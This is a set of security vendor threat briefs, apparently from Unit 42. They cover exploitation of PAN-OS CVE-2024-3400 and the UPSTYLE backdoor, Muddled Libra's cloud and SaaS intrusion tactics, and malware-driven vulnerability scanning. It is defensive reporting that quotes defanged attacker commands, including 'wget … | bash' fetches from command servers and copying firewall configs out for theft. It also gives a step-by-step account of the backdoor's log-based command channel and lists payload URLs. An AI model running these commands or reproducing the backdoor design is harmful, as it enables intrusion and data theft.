  • secshow[.]net
  • secshow[.]online
  • secdns[.]site

IP addresses associated with this activity

  • 35.75.233[.]210
  • 202.112.47[.]45

Additional Resources

Updated May 13, 2024, at 10:15 a.m. PT to correct Table 2 and 3. 

Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)

Executive Summary

This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.

Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.

A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access.

For up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory on this issue. Additionally, episode 21 of the Unit 42 podcast Threat Vector covers the discovery, technical details and exploitation of the vulnerability.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Third parties have disclosed proofs of concept for this vulnerability. We are also aware of a proof of concept including post-exploit persistence techniques that survive resets and upgrades. We are not aware of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability at this time.

We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse.

The section Current Scope of the Attack includes information on the types of exploitation activity we have seen, as well as their relative prevalence. The vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some compromises of PAN-OS that are limited to confirming that the device is exploitable.

Other cases have included the following activity:

  • Limited attempts in which a file on the hard drive has been copied to a location accessible via a web request
  • A very limited number of compromises that led to interactive command execution

This threat brief will cover information about the vulnerability and what we know about post-exploitation activity. We will share guidance to mitigate the vulnerability, though readers should also refer to the Security Advisory for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available.

If you believe your firewall has been compromised, please reach out to Palo Alto Networks support.

This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3 and all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases are also available. Additional guidance on mitigation for customers is available in the Security Advisory.

A Knowledge Base article, How to Remedy CVE-2024-3400, is available in the Customer Support Portal.

As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity.

We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis.

Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:

Customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat ID 95187, 95189 and 95191 (available in Applications and Threats content version 8836-8695 and later). Our advisory has been updated with new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.

To apply the Threat IDs, customers must ensure that vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more information.

The Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this CVE.

Vulnerabilities Discussed CVE-2024-3400

Details of the Vulnerability

A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both). 

Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.

Current Scope of the Attack

Palo Alto Networks has classified observations of attempted exploitation into several levels, from Level 0 to Level 3. In all cases we recommend following the guidance in the Security Advisory.

Level 0: Probe An unsuccessful exploitation attempt. Forensic artifacts indicate that the attempt was made to access the customer network, but the attacker did not actually succeed. Palo Alto Networks assesses there is likely little to no immediate impact of a Level 0 attempt.

Level 1: Test – The vulnerability was being tested on the device. A 0-byte file has been created and is resident on the firewall. However, there is no indication of any known unauthorized command execution.

Level 2: Potential Exfiltration A file on the device has been copied to a location accessible via a web request, though the file may or may not have been subsequently downloaded. Typically, the file we have observed being copied is running_config.xml.

Level 3: Interactive Access There are signs of interactive command execution. This may include shell-based backdoors, introduction of code, downloading files or running commands.

It is important to note that the vast majority of cases that Unit 42 has responded to have been unsuccessful attempts to exploit the vulnerability and some Level 1 compromises of PAN-OS. Other cases have included limited Level 2 and very limited Level 3 compromises of those targeted firewalls.

UPSTYLE and Cron Job Backdoor Activity

As part of the activity observed in Operation MidnightEclipse, the threat actor exploited CVE-2024-3400 to run commands on the firewall. We have determined that the threat actor initially intended to install a Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE.

We believe the threat actors created UPSTYLE specifically for this campaign. However, the threat actors were unsuccessful at installing UPSTYLE after three different exploit attempts. After the third failed attempt, the threat actor decided to install a cron job backdoor to carry out their post-exploitation activities.

After failing to install UPSTYLE, the threat actor was observed exploiting CVE-2024-3400 to run a handful of the commands on the firewall. The commands included copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files.

The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor:

  • 66.235.168[.]222

After gathering configuration files, the threat actor exploited the vulnerability to run the following command to receive additional commands from an external server in the form of a bash script:

  • wget -qO- hxxp://172.233.228[.]93/patch|bash

We were unable to access the bash script hosted at this URL. However, shortly after we saw evidence of the creation of a cron job. This cron job would run every minute to access commands hosted on the same external server that would execute via bash, as seen in the following command:

  • wget -qO- hxxp://172.233.228[.]93/policy | bash

We were unable to access the commands executed via this URL, but we believe this cron job-based backdoor was used to carry out the actor’s post-exploitation activities.

While the threat actors were unable to install the UPSTYLE backdoor, it appears that they created it specifically for this campaign and planned on using it as the initial backdoor. Also, the reason the actors failed to install UPSTYLE included mistakes in the exploit attempts themselves, as well as trivial mistakes in the executed commands. While we have not seen UPSTYLE used in any other exploit attempts, it is possible that UPSTYLE could have been successfully installed on other devices.

As previously mentioned, the threat actors attempted three unsuccessful exploit attempts to run commands to install UPSTYLE. For two of these attempts, UPSTYLE was hosted at hxxp://144.172.79[.]92/update.py.

In the third exploit attempt, we saw the actor hosting the backdoor at nhdata.s3-us-west-2.amazonaws[.]com, which may suggest that the actors thought network-based protections caused the first two failed installation attempts. According to the following HTTP headers, it appears that the threat actor last modified UPSTYLE hosted at 144.172.79[.]92 on April 7, 2024:

The update.py file hosted at 144.172.79[.]92 has a SHA256 value of 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers.

First, update.py writes another Python script to the following location:

  • [snip]/site-packages/system.pth

The Python script written to system.pth Base64-decodes an embedded Python script and executes it. This embedded Python script has two functions named protect and check, which are called in that order.

The protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a persistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running another Base64 embedded Python script, which is the functional backdoor.

The Python script run by system.pth has a function named __main that will run in a thread. This function first reads the contents of the following file, along with its access and modified times:

  • [snip]/css/bootstrap.min.css

It then enters an infinite loop that iterates once every two seconds, reading in the following file:

  • [snip]/sslvpn_ngx_error.log

The script will then iterate through each line of the file and search the line for the threat actor's command using the following regular expression:

  • img\[([a-zA-Z0-9+/=]+)\]

If the above regular expression matches, the script will Base64-encode the contents of the command and run it using the popen method within Python's OS module. The lines of the sslvpn_ngx_error.log file that do not match the regular expression are written back to the file, which essentially prunes the lines that contain commands from persisting in the sslvpn_ngx_error.log file for later analysis.

After running the command, the script writes the output of the command to the following file:

  • [snip]/css/bootstrap.min.css

The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file. It then sets the access and modified times back to their original values.

The point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.

The use of legitimate log files to receive commands and a legitimate CSS file to exfiltrate the command results suggests that the threat actors developed this backdoor specifically to run on a compromised firewall.

Guidance

We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.

This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. 

Please see the frequently updated Palo Alto Networks Security Advisory on CVE-2024-3400 for information on hotfixes and the most current guidance for mitigating this vulnerability. A Knowledge Base article, How to Remedy CVE-2024-3400, is available in the Customer Support Portal.

In earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.

Additional Exploitation Observations

While continuing to monitor efforts, we have observed additional IP addresses attempting to exploit CVE-2024-3400 based on our Threat Prevention signature with a Threat ID 95187.

We have not seen any relationships between these indicators and those associated with Operation MidnightEclipse. We have grouped the latter of these indicators exclusively to the activity involving exploitation of the zero-day vulnerability and the UPSTYLE backdoor.

As of writing this update, the following IP addresses have triggered the threat prevention signature:

  • 110.47.250[.]103
  • 126.227.76[.]24
  • 38.207.148[.]123
  • 147.45.70[.]100
  • 199.119.206[.]28
  • 38.181.70[.]3
  • 149.28.194[.]95
  • 78.141.232[.]174
  • 38.180.128[.]159
  • 64.176.226[.]203
  • 38.180.106[.]167
  • 173.255.223[.]159
  • 38.60.218[.]153
  • 185.108.105[.]110
  • 146.70.192[.]174
  • 149.88.27[.]212
  • 154.223.16[.]34
  • 38.180.41[.]251 
  • 203.160.86[.]91
  • 45.121.51[.]2

From our analysis, we do not see any additional activity from these IP addresses outside probing the vulnerability to determine either if the firewall is vulnerable or compromised. We have seen the following commands within the exploit attempts that the threat prevention signature is blocking:

  • touch [snip]/global-protect/index.css
  • touch [snip]/global-protect/portal/css/test.min.css
  • cp [snip]/running-config.xml [snip]/global-protect/[16 random characters].css

The commands above show two examples of the use of the touch command to create an empty file in the web application folder. The client would then attempt to access this file via an HTTP request to determine if exploitation was successful. The third command shows a bit more malicious behavior, which involves copying the running configuration to the web application folder for access.

We have also seen probing attempts that use either wget or curl to access remote servers that an external party would use the outbound HTTP request to determine successful exploitation and command execution:

  • wget srgsd1f.842b727ba4.ipv6.1433.eu[.]org
  • wget edcjn.57fe6f5d9d.ipv6.1433.eu[.]org
  • curl srgsdf.842b727ba4.ipv6.1433.eu[.]org
  • wget --no-check-certificate https://45.121.51[.]2/abc.txt

Conclusion

The Security Advisory will continue to provide up-to-date information on impacts to Palo Alto Networks products and recommended mitigations. We will continue to update this threat brief with information on exploitation.

Again, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity's blog for their analysis.

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Protections and mitigations for the observed exploitation activity are below and will be updated as more become available.

Palo Alto Networks Product Protections for CVE-2024-3400

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you may have been compromised or have an urgent matter, get in touch with Palo Alto Networks support.

Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention

Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signatures 95187, 95189 and 95191.

Cortex XDR, XSIAM and the Unified Cloud Agent 

Cortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to enumerate or laterally move to other assets.

Cortex Xpanse and XSIAM ASM Module

Cortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks GlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.

Indicators of Compromise

UPSTYLE Backdoor

  • 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
  • 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

Command and Control Infrastructure

  • 172.233.228[.]93
  • hxxp://172.233.228[.]93/policy
  • hxxp://172.233.228[.]93/patch
  • 66.235.168[.]222

Hosted Python Backdoor

  • 144.172.79[.]92
  • nhdata.s3-us-west-2.amazonaws[.]com

Observed Commands

  • wget -qO- hxxp://172.233.228[.]93/patch|bash
  • wget -qO- hxxp://172.233.228[.]93/policy | bash
  • "failed to unmarshal session(.\+.\/" mp-log gpsvc.log* (Please see our Security Advisory for further information on this command.)

Additional Resources

Update Log

  • Updated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional Resources.
  • Updated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections.
  • Updated April 14, 2024, at 11:05 a.m. PT to clarify impact on GlobalProtect portal configurations.
  • Updated April 14, 2024, at 7:55 p.m. PT to reflect that hotfixes are in place and ETAs added in our Security Advisory for upcoming hotfixes.
  • Updated April 15, 2024, at 8:35 a.m. PT to update exploitation activity in Executive Summary.
  • Updated April 15, 2024, at 9:16 a.m. PT to update language on Threat ID 95187 in the Executive Summary, including information on firewalls managed by Panorama.
  • Updated April 16, 2024, at 7:45 a.m. PT to add Additional Exploitation Observations section with IoCs and commands.
  • Updated April 16, 2024, at 9:48 a.m. PT to remove update.py filename from list of indicators.
  • Updated April 16, 2024, at 2:00 p.m. PT to update the Executive Summary and Mitigations section to add new mitigation guidance, a new Threat Prevention signature and availability of PAN-OS fixes.
  • Updated April 16, 2024, at 2:40 p.m. PT to align the Executive Summary and Details of the Vulnerability sections more closely to the Security Advisory.
  • Updated April 17, 2024, at 6:15 a.m. PT to add Threat ID 95191.
  • Updated April 17, 2024, at 11:30 a.m. PT to add an additional bullet to the Observed Commands subsection.
  • Updated April 17, 2024, at 12:23 p.m. PT to clarify contact information.
  • Updated April 19, 2024, at 12:45 p.m. PT to heavily revise the Current Scope of Attack section as well the section on Operation MidnightEclipse activity (UPSTYLE and Cron Job Backdoor Activity).
  • Updated April 22, 2024, at 3:15 p.m. PT to more thoroughly define the levels of activity seen in the Current Scope of the Attack section.
  • Updated April 23, 2024, at 7:40 a.m. PT to add language to recommendations for Level 2 and Level 3 in Scope of Attack section. Clarified language in Guidance section. Added Update Log section.
  • Updated Apr 24, 2024, at 7:10 a.m. PT to include a link to a Customer Support Portal Knowledge Base article.
  • Updated April 24, 2024, at 6:15 p.m. PT to include updated XQL queries for hits for known IoCs in NGFW traffic and in XDR telemetry and NGFW telemetry.
  • Updated April 25, 2024, at 8:00 a.m. PT to add Knowledge Base article to Additional Resources.
  • Updated April 26, 2024, at 12:22 p.m. PT for clarity and consistency.
  • Updated April 29, 2024, at 6:52 a.m. to add Unit 42 Threat Vector podcast on the vulnerability to Additional Resources.
  • Updated April 29, 2024, at 11:55 a.m. PT to update exploitation status about proof of concept by third parties of post-exploit persistence techniques.
  • Updated May 1, 2024, at 8:05 a.m. PT for clarity and consistency.
  • Updated May 3, 2024, at 7:25 a.m. PT to note additional mitigation information for customers was added to the Security Advisory.
  • Updated May 20, 2024, at 8:10 a.m. PT to adjust second threat hunting query.

Muddled Libra’s Evolution to the Cloud

Executive Summary

Unit 42 researchers have discovered that the Muddled Libra group now actively targets software-as-a-service (SaaS) applications and cloud service provider (CSP) environments. Organizations often store a variety of data in SaaS applications and use services from CSPs. The threat actors have begun attempting to leverage some of this data to assist with their attack progression, and to use for extortion when trying to monetize their work.

Muddled Libra also uses the legitimate scalability and native functionality of CSP services to create new resources to assist with data exfiltration. All CSPs have terms of service (TOS) policies that explicitly prohibit activities like those performed by Muddled Libra.

This article covers the following:

  • Various access methodologies that are used for SaaS environments and CSPs
  • Common exploits
  • Data reconnaissance
  • Tactics to abuse CSP services for data exfiltration

All these methods follow a detectable pattern and mitigations can be implemented based on these patterns to protect an organization. With environments evolving to use more SaaS applications and a variety of CSPs, organizations need additional protections to secure their resources and those listed below can help protect them.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Prisma Cloud provides detection, alerting and mitigation operations across several components within multicloud and hybrid environments.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Amazon Web Services (AWS) and Azure customers are protected by the threats discussed through the following services:

Related Unit 42 Topics Muddled Libra

Access Methodology

As part of Muddled Libra’s tactics evolution, they start by performing reconnaissance to identify administrative users to target for their initial access when social engineering the help desk. This development was first observed late in 2023 and we have seen activity as recent as January 2024. Muddled Libra also performs extensive research to uncover information about what applications are deployed and what CSPs an organization uses.

Figure 1 illustrates the actions that fall under the MITRE ATT&CK framework for reconnaissance. We will continue to use the framework as we discuss the tactics, techniques and procedures (TTPs) of Muddled Libra.

Image 1. Reconnaissance. Identify administrative users. Profile target organization for application usage.
Figure 1. Muddled Libra’s reconnaissance steps.

Muddled Libra purposefully targets administrative users during their social engineering attacks since those users have elevated permissions within identity providers, SaaS applications and organizations’ various CSP environments. After initial access, the group exploits identity providers to perform privilege escalation, by bypassing IAM restrictions and modifying permission sets associated with users to increase their scope of access.

The Okta cross-tenant impersonation attacks that occurred from late July to early August 2023, where Muddled Libra bypassed IAM restrictions, display how the group exploits Okta to access SaaS applications and an organization's various CSP environments. They accessed an organization’s Okta Identity Portal through technology administrator accounts that the group compromised as part of their new tactic of help desk social engineering. Then they modified permissions to increase their scope of access. By modifying permission sets of compromised users, this escalated their privileges to gain further access to SaaS applications and organization's CSP environments.

Muddled Libra also added additional identity providers with impersonation privileges, which allowed them to access additional applications while impersonating other user accounts. The Conclusion section includes recommendations for Identity Portal hardening.

Accessing SaaS Applications

After gaining access to an environment, Muddled Libra uses the information obtained during reconnaissance to perform discovery internally to find the sign-in pages for SaaS applications. Organizations using single-sign-on (SSO) portals to manage application access (such as Okta) are of particular interest. Figure 2 maps the lateral movement techniques used by Muddled Libra.

Image 2. Lateral movement. Exploiting admin credentials to access SSO portals for quick access to SaaS applications and organizations CSP environments. Utilize unique credentials found in other parts of the environment to access CSP.
Figure 2. Muddled Libra’s lateral movement steps.

The SSO portal of a technology administrator will have an organization’s security information and event management (SIEM), endpoint detection and response (EDR) and password management system (PMS) listed. These administration tools are all of interest to the attackers because they can execute permission modification and identity provider configuration changes. SSO portals also allow them to quickly iterate through applications to find those that would benefit their campaign.

The SaaS Application Exploits section below expands on this activity.

Accessing an Organization’s Cloud Service Provider Environments

How attackers access organizations' different CSP environments depends on their unique configurations. The Muddled Libra group takes advantage of any authentication method to gain access to an organization's cloud network, most commonly organizations’ AWS and Azure environments.

Similar to the activity we described with attackers accessing SaaS applications, if SSO is integrated to an organization’s CSP, attackers use this functionality to gain access to those CSP environments. If SSO is not configured, the group performs discovery across an organization's environment, to uncover CSP credentials stored in unsecured locations due to an organization's poor technology hygiene.

SaaS Application Exploits

When reviewing common SaaS application exploits, attacker activity falls under three categories:

  • Finding relevant data
  • Locating credentials
  • Modifying SaaS application configuration

Figure 3 fits these activities under discovery in the MITRE ATT&CK framework.

Image 3. Discovery — SaaS. Utilize SaaS applications to locate sensitive information and credentials.
Figure 3. Muddled Libra’s discovery techniques using SaaS.

Depending on the type of SaaS application, the data within the application might be more beneficial for use by threat actors in traditional data exfiltration or for learning about a target’s environment configuration. Historically, Muddled Libra looks for data that falls under either of these classifications within any SaaS application they compromise. They also make a large effort to search for other credentials within a SaaS application.

Sensitive credentials can be exposed in logs, as well as within PMS applications and SaaS applications that scan for sensitive information. Muddled Libra methodically searches for applications that might store this type of valuable information to then use later on in their attacks for privilege escalation and lateral movement.

Microsoft provides a wide range of services and tools that become key targets during an attack due to their high value to both organizations and threat actors. An example of how Muddled Libra takes advantage of a SaaS application is how the group exploits Microsoft SharePoint.

The SharePoint platform is used by organizations to store files that document network topology, as well as what tools an organization uses and other general information. Muddled Libra targets this platform to gain a better understanding of the network configuration within a company and which tools they can exploit, such as remote access tools.

As with any file storage tool, other sensitive information (such as passwords) can also get leaked from these documents. Also, within the Microsoft 365 (M365) suite, the group targets email boxes and other email functionality to gain access to sensitive data.

CSP Reconnaissance and Gathering Intel

A large portion of Muddled Libra’s campaigns involve gathering intelligence and data. Attackers then use this to generate new vectors for lateral movement within an environment. Organizations store a variety of data within their unique CSP environments, thus making these centralized locations a prime target for Muddled Libra. Figure 4 itemizes these discovery tactics.

Image 4. Discovery — AWS. Inventory of users, access, keys, and identity provider connections. Gather sensitive information stored in AWS Secrets Manager.
Figure 4. Muddled Libra’s discovery techniques using AWS.

AWS Intel Gathering

Muddled Libra targets a wide range of services within an organization’s AWS environment to gather more intel for use later on in the attack. These services include AWS IAM, Amazon Simple Storage Service (S3) and AWS Secrets Manager.

The IAM service provides the following information:

  • Which users exist within the AWS account
  • Access keys associated with users
  • What identity provider connections exist

Some AWS IAM API calls that can be used for reconnaissance include:

The first three – listing users, groups and roles – provide the threat actors with high-level information about user groups and what unique roles an organization has created to meet their business needs. The rest of the API calls return information about the following:

  • SSH public keys
  • Service credentials
  • Certificates
  • Various identity providers

The threat actor group wants to learn about these things to broaden their understanding of the environment configuration for the next stages of their attack. None of these API calls return sensitive information associated with the various credentials.

S3 buckets, which are an AWS object level storage service, can contain any sort of data depending on an organization. Because of this, Muddled Libra spends time listing available buckets and then reviewing bucket data more closely depending on the relevance of the bucket names. Some reconnaissance AWS S3 API calls include ListBuckets and various GetBucket* operations.

Secrets Manager can store sensitive secrets, so this service is especially interesting for the group to use for lateral movement to other applications within the environment. While native cloud credentials cannot be discovered or enumerated using cloud APIs, legacy technologies such as SQL databases running within a cloud environment typically require credentials such as usernames and passwords. Secrets Manager is designed to store such secrets, and also has features for automatically rotating them periodically.

Some reconnaissance AWS Secrets Manager API calls include:

The GetSecretValue event specifically returns the data stored within a secret. This helps the group move laterally to other applications if the secret contains credentials.

Azure Intel Gathering

To collect sensitive data and network configuration details within Azure, Muddled Libra focuses on storage account access keys and resource groups. Storage account access keys provide access to an Azure storage account, allowing Muddled Libra to iterate through resources such as Azure Blob Storage and Azure Files to locate the most valuable data relevant to their attack.

Both Azure Blob and Azure Files provide organizations with unique storage offerings built for a variety of data types. Figure 5 highlights the group’s discovery tactics using Azure.

Image 5. Discovery — Azure. Collect sensitive information from Azure blob and Azure files storage. Locate valuable targets from Azure resource groups.
Figure 5. Muddled Libra’s discovery techniques using Azure.

Azure resource groups are logical containers used to batch resources together. By simply learning the names of the various resource groups, threat actors can figure out which resource groups contain the most valuable virtual machines (VMs) that might contain sensitive data. The Figure 6 diagram shows what these resource groups potentially encompass that might be of interest to the threat actors.

Image 6 as a tree diagram of a resource group with attacker targets highlighted. The resource group is at the top. Stemming from it are blobs, virtual machine scale sets, virtual machines, and public IP addresses.
Figure 6. Resource group with various attacker targets.

CSP Data Exfiltration Techniques

Muddled Libra leverages legitimate CSP services and features to more quickly and efficiently exfiltrate data. These components exist for organizations to better manage their workloads and simplify their processes, but as with many tools, threat actors can use those same services to accomplish their malicious goals.

AWS Exfiltration Techniques

When it comes to exfiltrating data from an organization's AWS environment, Muddled Libra targets two legitimate AWS services to quickly move data. Muddled Libra uses both the AWS DataSync and AWS Transfer services, to transfer data from an on-premises environment to the cloud and then from the cloud to an external entity.

AWS DataSync enables the transfer of data from on-premises to various AWS storage services. The AWS Transfer service enables data transfer to and from various AWS storage services. Figure 7 highlights these exfiltration tactics.

Image 7. Exfiltration – AWS. Exploit AWS DataSync and AWS transfer services.
Figure 7. Muddled Libra’s exfiltration techniques using AWS.

By using these services in tandem, Muddled Libra can move data very quickly out of an environment. When a new AWS Transfer server gets created, the following AWS API events appear in the CloudTrail logs:

An AWS Transfer user is specifically created as part of the host creation, so the CreateUser event is associated with transfer.amazonaws.com as the event source. To protect against this activity, organizations can use the AWS IAM Access Analyzer to gauge the permissiveness of resources and lock down credentials to follow the principle of least privilege. In addition to limiting IAM permissions, organizations can use AWS Service Control Policies (SCP) to completely block services an organization doesn’t use such as DataSync or AWS Transfer, regardless of the permissions associated with a principal.

Azure Exfiltration Techniques

One method of data exfiltration threat actors use in Azure exploits traditional VM functionality known as snapshots to take images of hosts that contain sensitive information pertinent to Muddled Libra’s attack objectives. Snapshots allow users to take a point-in-time image of a virtual hard disk (VHD).

CSPs have restrictions in place regarding sharing snapshot resources with external entities. Muddled Libra avoids this by creating new VMs within the compromised environment and then saving the relevant operational data from the snapshots to the newly created hosts for staging before exfiltrating the data. Figure 8 lists these collection and exfiltration techniques.

Image 8. Collection. Exfiltration — Azure. Create snapshots of sensitive hosts. Create new virtual machines.
Figure 8. Muddled Libra’s collection and exfiltration techniques using Azure.

Once the data exists on the newly created VMs, threat actors can exfiltrate the data via traditional network exfiltration techniques.

Conclusion

By expanding their tactics to include SaaS applications and cloud environments, the evolution of Muddled Libra’s methodology shows the multidimensionality of cyberattacks in the modern threat landscape. The use of cloud environments to gather large amounts of information and quickly exfiltrate it poses new challenges to defenders. Figure 9 displays the full attack chain used by Muddled Libra when targeting SaaS applications and organizations' CSP environments.

Image 9 is a list of all of the MITRE ATT&CK steps used by Muddled Libra when targeting CSPs.
Figure 9. Muddled Libra attack chain in the cloud.

Identity Portals provide a great starting point for centralizing credential management, reducing administrative overhead and improving the end-user experience, but this also makes them prime targets for attackers. These platforms must be protected with robust and difficult-to-bypass secondary authentication factors such as hardware tokens or biometrics, and they should be closely monitored for unusual activity.

To protect CSP identities, defenders can use AWS IAM roles and Microsoft Entra Privileged Identity Management (PIM) to limit the long-term access attackers can gain, forcing attackers to reauthenticate more often. This limitation adds another layer of complexity to the threat actor’s attack, and the reauthentication process creates more abnormal, detectable events for defenders.

Despite Muddled Libra’s constantly changing attack tactics, defenders can build better protections by understanding the end goal of these threat actors to then implement and improve technology protections to safeguard environments.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through Prisma Cloud, which provides detection, alerting and mitigation operations across several components within multicloud and hybrid environments.

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Updated April 10, 2024, at 7:37 a.m. PT to correct language in Figure 8 and 9. 

It Was Not Me! Malware-Initiated Vulnerability Scanning Is on the Rise

Executive Summary

Our telemetry indicates a growing number of threat actors are turning to malware-initiated scanning attacks. This article reviews how attackers use infected hosts for malware-based scans of their targets instead of the more traditional approach using direct scans.

Threat actors have been using scanning methods to pinpoint vulnerabilities in networks or systems for a very long time. Some scanning attacks originate from benign networks likely driven by malware on infected machines. By launching scanning attacks from compromised hosts, attackers can accomplish the following:

  • Covering their traces
  • Bypassing geofencing
  • Expanding botnets
  • Leveraging the resources of these compromised devices to generate a higher volume of scanning requests compared to what they could achieve using only their own devices

We identified several prominent characteristics of scanning behavior, such as an unusually high volume of requests. Using these characteristics and the signatures of known threats, we are able to detect known cases as well as emerging new scanning patterns.

Palo Alto Networks customers receive protection against malicious scanning activity through our Next-Generation Firewall and Prisma SASE with Cloud-Delivered Security Services enabled, including Advanced URL Filtering, Advanced Threat Prevention, Advanced WildFire and DNS Security.

The Prisma Cloud WAAS module helps protect cloud-native web applications and API endpoints from scanning attacks.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Ivanti, Mirai

Introduction to Scanning Attacks

Scanning occurs when an attacker initiates network requests in an attempt to exploit the potential vulnerabilities of the target hosts. The target hosts are typically benign and potentially vulnerable to the CVE targeted by the attacker.

Commonly seen scanning behaviors include the following:

  • Port scanning
  • Vulnerability scanning
  • OS fingerprinting

In Figure 1, we depict an attack model of a simple direct incident of attacker scanning. In this model, the attacker makes an HTTP POST request (as described in our MOVEit-related threat brief) to the fictional random-university[.]edu in an attempt to scan for and subsequently exploit the MOVEit vulnerability CVE-2023-34362. If random-university[.]edu is vulnerable to this CVE and there is no other protection mechanism employed, this attack would succeed.

Image 1 is a diagram of how direct attacker scanning works. The attacker sends an HTTP POST request to the target host.
Figure 1. Direct attacker scanning.

Multi-Network Monitoring Reveals Emerging Scanning Patterns

By tracking traffic logs from multiple networks, we see requests to a high number of destinations with seemingly benign paths. For example, our telemetry indicates that URLs ending with guestaccess.aspx have been requested 7,147 times in 2023 by at least 1,406 devices. This endpoint is tied to the MOVEit vulnerability CVE-2023-34362, which was published on June 2, 2023.

When we review our historic data, we observe this endpoint in our telemetry with different destination websites even before the CVE publish date. After reviewing our telemetry from multiple networks, we detected over 66 million requests in 2023 that were potentially associated with scanning activity.

Scanning Attacks With New URLs for Payload Delivery or C2

We observed many scanning cases where attackers embedded previously unseen URLs for payload delivery or C2 together with the exploit request. This reduces the possibility of subsequent payload or C2 URLs being blocked by security vendors. As these payload delivery or C2 URLs are new to security vendors, it is crucially important to detect and block such initial scanning requests as vendors are unlikely to block subsequent requests.

On Jan. 12, 2024, 11:23:49 UTC, we detected scanning by a Mirai variant with the following malicious URL in its payload:

  • 103.245.236[.]188/skyljne.mips

On Jan. 18, 2024, 07:31:07 UTC, we detected a scanning attempting to exploit the Ivanti vulnerabilities with the following malicious URL in its payload:

  • 45.130.22[.]219/ivanti.js

